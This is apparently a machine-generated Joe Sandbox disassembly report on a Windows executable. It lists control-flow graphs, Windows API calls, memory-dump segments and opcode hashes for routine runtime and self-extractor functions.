                                                              control_flow_graph 1067 42b568-42b581 PeekMessageW 1068 42b583-42b597 GetMessageW 1067->1068 1069 42b5bc-42b5be 1067->1069 1070 42b5a8-42b5b6 TranslateMessage DispatchMessageW 1068->1070 1071 42b599-42b5a6 IsDialogMessageW 1068->1071 1070->1069 1071->1069 1071->1070
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0042B579
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0042B58A
                                                              • IsDialogMessageW.USER32(0001041E,?), ref: 0042B59E
                                                              • TranslateMessage.USER32(?), ref: 0042B5AC
                                                              • DispatchMessageW.USER32(?), ref: 0042B5B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                              • String ID:
                                                              • API String ID: 1266772231-0
                                                              • Opcode ID: 8b775c821bd675a07ac94297ada6f94e035daf5e4d4b0c08924fbef7b375a82f
                                                              • Instruction ID: 2c4dcd33bb5c3348511b2b272bf7af3c4018899bab2f6561f9c0815f7ae477d8
                                                              • Opcode Fuzzy Hash: 8b775c821bd675a07ac94297ada6f94e035daf5e4d4b0c08924fbef7b375a82f
                                                              • Instruction Fuzzy Hash: E2F0D071A0126ABB8B209FE5EC4CDDB7FBCEE053967404425B909D2114EB38E645DBF8

                                                              Control-flow Graph
                                                              control_flow_graph 1072 42dbde-42dc09 call 42ec50 SetEnvironmentVariableW call 420371 1076 42dc0e-42dc12 1072->1076 1077 42dc36-42dc38 1076->1077 1078 42dc14-42dc18 1076->1078 1079 42dc21-42dc28 call 42048d 1078->1079 1082 42dc1a-42dc20 1079->1082 1083 42dc2a-42dc30 SetEnvironmentVariableW 1079->1083 1082->1079 1083->1077
                                                              APIs
                                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0042DBF4
                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0042DC30
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentVariable
                                                              • String ID: sfxcmd$sfxpar
                                                              • API String ID: 1431749950-3493335439
                                                              • Opcode ID: c44160e836a74800adf3ea3a8f154f367da89f01ef1246921a45e83fc5a0fa6e
                                                              • Instruction ID: 1a5756eaeb0dd1dd6e94364a0befe59a88862eedb4ab5f0a6321d43167ac544c
                                                              • Opcode Fuzzy Hash: c44160e836a74800adf3ea3a8f154f367da89f01ef1246921a45e83fc5a0fa6e
                                                              • Instruction Fuzzy Hash: 7DF0EC72A0423467DF202FD7AC06BFB7798AF05B86B440457BD8596152D6B88D40D6BC

                                                              Control-flow Graph
                                                              control_flow_graph 1084 419785-419791 1085 419793-41979b GetStdHandle 1084->1085 1086 41979e-4197b5 ReadFile 1084->1086 1085->1086 1087 419811 1086->1087 1088 4197b7-4197c0 call 4198bc 1086->1088 1089 419814-419817 1087->1089 1092 4197c2-4197ca 1088->1092 1093 4197d9-4197dd 1088->1093 1092->1093 1094 4197cc 1092->1094 1095 4197df-4197e8 GetLastError 1093->1095 1096 4197ee-4197f2 1093->1096 1097 4197cd-4197d7 call 419785 1094->1097 1095->1096 1098 4197ea-4197ec 1095->1098 1099 4197f4-4197fc 1096->1099 1100 41980c-41980f 1096->1100 1097->1089 1098->1089 1099->1100 1102 4197fe-419807 GetLastError 1099->1102 1100->1089 1102->1100 1104 419809-41980a 1102->1104 1104->1097
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00419795
                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 004197AD
                                                              • GetLastError.KERNEL32 ref: 004197DF
                                                              • GetLastError.KERNEL32 ref: 004197FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$FileHandleRead
                                                              • String ID:
                                                              • API String ID: 2244327787-0
                                                              • Opcode ID: 54614173e0344e5ed5c3b0701363fed294c9cb552499b7854e4e9511a220430b
                                                              • Instruction ID: 1dbbd5c9ac40ae1a16a692038da1c1129c8f16dcb62e4fef9c9500dec63eb07d
                                                              • Opcode Fuzzy Hash: 54614173e0344e5ed5c3b0701363fed294c9cb552499b7854e4e9511a220430b
                                                              • Instruction Fuzzy Hash: EF118234920204EBDF206F65D8146EA77A9FF42725F108A3BF426852D0D7789EC4DB6A
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0041D710,00000000,00000000,?,0043ACDB,0041D710,00000000,00000000,00000000,?,0043AED8,00000006,FlsSetValue), ref: 0043AD66
                                                              • GetLastError.KERNEL32(?,0043ACDB,0041D710,00000000,00000000,00000000,?,0043AED8,00000006,FlsSetValue,00447970,FlsSetValue,00000000,00000364,?,004398B7), ref: 0043AD72
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0043ACDB,0041D710,00000000,00000000,00000000,?,0043AED8,00000006,FlsSetValue,00447970,FlsSetValue,00000000), ref: 0043AD80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID:
                                                              • API String ID: 3177248105-0
                                                              • Opcode ID: 6083f9a36e2f042f8472b3f471fde114a3125ae2e45aec1cf432556b49c5f531
                                                              • Instruction ID: 6086d29ab71cdc293acb6c112a4f2612c70c80721223636ba85fda769b5b166b
                                                              • Opcode Fuzzy Hash: 6083f9a36e2f042f8472b3f471fde114a3125ae2e45aec1cf432556b49c5f531
                                                              • Instruction Fuzzy Hash: 70014C36281222ABC7218F689C449577B69EF49B73F100731F946D3650C724C811C6EA
                                                              APIs
                                                                • Part of subcall function 004397E5: GetLastError.KERNEL32(?,00451030,00434674,00451030,?,?,00433F73,00000050,?,00451030,00000200), ref: 004397E9
                                                                • Part of subcall function 004397E5: _free.LIBCMT ref: 0043981C
                                                                • Part of subcall function 004397E5: SetLastError.KERNEL32(00000000,?,00451030,00000200), ref: 0043985D
                                                                • Part of subcall function 004397E5: _abort.LIBCMT ref: 00439863
                                                                • Part of subcall function 0043BB4E: _abort.LIBCMT ref: 0043BB80
                                                                • Part of subcall function 0043BB4E: _free.LIBCMT ref: 0043BBB4
                                                                • Part of subcall function 0043B7BB: GetOEMCP.KERNEL32(00000000,?,?,0043BA44,?), ref: 0043B7E6
                                                              • _free.LIBCMT ref: 0043BA9F
                                                              • _free.LIBCMT ref: 0043BAD5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorLast_abort
                                                              • String ID: pD
                                                              • API String ID: 2991157371-1597287149
                                                              • Opcode ID: ea7c47eb71083f1a923c6fa41ee7560f3d13b4c11d0f741053a4b0defbef3db5
                                                              • Instruction ID: 4a0187248d98a90188a948cea08d16aa5805b83985efcf64dc397ec1513dd2c9
                                                              • Opcode Fuzzy Hash: ea7c47eb71083f1a923c6fa41ee7560f3d13b4c11d0f741053a4b0defbef3db5
                                                              • Instruction Fuzzy Hash: 7931E731904609AFDB10EFAAC441B5EB7F1EF49324F21509FE6049B3A2EB795D40CB98
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E51F
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: (B$PDGu<B
                                                              • API String ID: 1269201914-2208658473
                                                              • Opcode ID: 6e6d175d176b2359ec4d9d919d3d75118afcf9f5bead9b603c359aa127b59eb4
                                                              • Instruction ID: 7d7baef5279772c0d8fc787fe3fc82edf1dfe671679d4fe884c9c2036d960e60
                                                              • Opcode Fuzzy Hash: 6e6d175d176b2359ec4d9d919d3d75118afcf9f5bead9b603c359aa127b59eb4
                                                              • Instruction Fuzzy Hash: 91B012C13690A07C3144614B3D02D7B050CC0C2F193B1C02FF408C6080F84D0C42143E
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E51F
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: 2B$PDGu<B
                                                              • API String ID: 1269201914-2697500272
                                                              • Opcode ID: ac60d3a3c47db43a48f760a2a57a425892ed3166c8a42ec83102ccce649c821f
                                                              • Instruction ID: 8bc9a655fb06e05fae7d03c3d1164404254e7f35725332bbbcc2f50355419506
                                                              • Opcode Fuzzy Hash: ac60d3a3c47db43a48f760a2a57a425892ed3166c8a42ec83102ccce649c821f
                                                              • Instruction Fuzzy Hash: 0BB012C13690507D3144614B3C02E7B014CD0C2F193B1C02FF408C6080F84C0C41143F
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0041D343,00000001,?,?,?,00000000,0042551D,?,?,?), ref: 00419F9E
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0042551D,?,?,?,?,?,00424FC7,?), ref: 00419FE5
                                                              • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0041D343,00000001,?,?), ref: 0041A011
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$Handle
                                                              • String ID:
                                                              • API String ID: 4209713984-0
                                                              • Opcode ID: b5dfb81fe6a0db10af1606ff3fe6c0229f8de410c013870f78dcd44a80e8817c
                                                              • Instruction ID: 36a4d63fbdf27c85f412071b15a8a4fafb7132e10f814ea414181fc910a57e5a
                                                              • Opcode Fuzzy Hash: b5dfb81fe6a0db10af1606ff3fe6c0229f8de410c013870f78dcd44a80e8817c
                                                              • Instruction Fuzzy Hash: DB31F331204305AFDB14CF20D818BAF7BA5FF85B15F00451EF94597290C779AD89CBAA
                                                              APIs
                                                                • Part of subcall function 0041C27E: _wcslen.LIBCMT ref: 0041C284
                                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0041A175,?,00000001,00000000,?,?), ref: 0041A2D9
                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0041A175,?,00000001,00000000,?,?), ref: 0041A30C
                                                              • GetLastError.KERNEL32(?,?,?,?,0041A175,?,00000001,00000000,?,?), ref: 0041A329
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectory$ErrorLast_wcslen
                                                              • String ID:
                                                              • API String ID: 2260680371-0
                                                              • Opcode ID: 6d707c314c7a1c89e71160c4551e3d9f062e748ad28d09d489f435ae4ed70425
                                                              • Instruction ID: bb02a8bc1b4346466d09ac665f3bf967904f2bf6ef07646245322309cb09ee99
                                                              • Opcode Fuzzy Hash: 6d707c314c7a1c89e71160c4551e3d9f062e748ad28d09d489f435ae4ed70425
                                                              • Instruction Fuzzy Hash: 7101D6352022145ADF219B764C49BEE23589F0A789F04045BFC01D1281D76CCAD186AE
                                                              APIs
                                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0043B8B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Info
                                                              • String ID:
                                                              • API String ID: 1807457897-3916222277
                                                              • Opcode ID: fddba786ca84e616703d913e2d665f474dfc21607a86818a844104effe346bd9
                                                              • Instruction ID: ce14dcd7ac96f07487cd35e2197b07de808e341496b8f0485166069f598593eb
                                                              • Opcode Fuzzy Hash: fddba786ca84e616703d913e2d665f474dfc21607a86818a844104effe346bd9
                                                              • Instruction Fuzzy Hash: 9A41F9B050424C9ADF218E258C84BE6BBA9EF49304F1414EED69A86242D339AA459FA5
                                                              APIs
                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0043AFDD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: String
                                                              • String ID: LCMapStringEx
                                                              • API String ID: 2568140703-3893581201
                                                              • Opcode ID: d21fc31e25b16bc0d58265997bd340fe0e7222b92c0433d6f0b3fe97afbc347f
                                                              • Instruction ID: 6387766099fe5cb6d20338f41936e758d3bec3a55b7739667effbfc27dad8cac
                                                              • Opcode Fuzzy Hash: d21fc31e25b16bc0d58265997bd340fe0e7222b92c0433d6f0b3fe97afbc347f
                                                              • Instruction Fuzzy Hash: E8012976544109BBDF029F91DC01DEE7F62FF0D754F41415AFE1426160C77A8A31AB89
                                                              APIs
                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0043A56F), ref: 0043AF55
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: CountCriticalInitializeSectionSpin
                                                              • String ID: InitializeCriticalSectionEx
                                                              • API String ID: 2593887523-3084827643
                                                              • Opcode ID: 0b1eb33b3bd24e50194e7e4a7583d8fb71af621614b3024f483c65521e0e7517
                                                              • Instruction ID: 9be93c63c4ee895e31f83261af9487720505be77d93ef750a07f958134414252
                                                              • Opcode Fuzzy Hash: 0b1eb33b3bd24e50194e7e4a7583d8fb71af621614b3024f483c65521e0e7517
                                                              • Instruction Fuzzy Hash: 97F0E975685218BFDF019F51DC02DAE7F61EF09B11F50406AFC0856260DB755E219B8E
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Alloc
                                                              • String ID: FlsAlloc
                                                              • API String ID: 2773662609-671089009
                                                              • Opcode ID: 7103808f138190ffd3c6738ccc85b084ff29c3c36381e23363c50c00fd04fe13
                                                              • Instruction ID: e1a50ae15272caca970538dfde5966dcc83c3dcc682222a106153ca79ce665ed
                                                              • Opcode Fuzzy Hash: 7103808f138190ffd3c6738ccc85b084ff29c3c36381e23363c50c00fd04fe13
                                                              • Instruction Fuzzy Hash: DEE055707C82187BE200AF26DC03E6EBB51EB09B22F4000ABFC0093240CE785E1282CE
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: 5df9531d45bc6c35d3a2f401a49350ab2214123a8ed72cc27b0a3e7765747638
                                                              • Instruction ID: fffceda8b99c615b86223b1898f877a337dc3ff32a32b04682fca93c45f5318d
                                                              • Opcode Fuzzy Hash: 5df9531d45bc6c35d3a2f401a49350ab2214123a8ed72cc27b0a3e7765747638
                                                              • Instruction Fuzzy Hash: B6B09295359120FC310422472852C3B021CC082B123B0C43FF845C0480A858AC01143A
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: 2603daee378259a88ed3a52eb6a8983290c57ac5662bc6d4ed87d5b4ae866857
                                                              • Instruction ID: 91d4b37e5c3a242e393fa78ccdde998382853924587b7592e64185fc9d8d2176
                                                              • Opcode Fuzzy Hash: 2603daee378259a88ed3a52eb6a8983290c57ac5662bc6d4ed87d5b4ae866857
                                                              • Instruction Fuzzy Hash: 5EB09295359120EC3144624B2842D3B021CC081B123B0803FF809C1080A858AC01153A
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
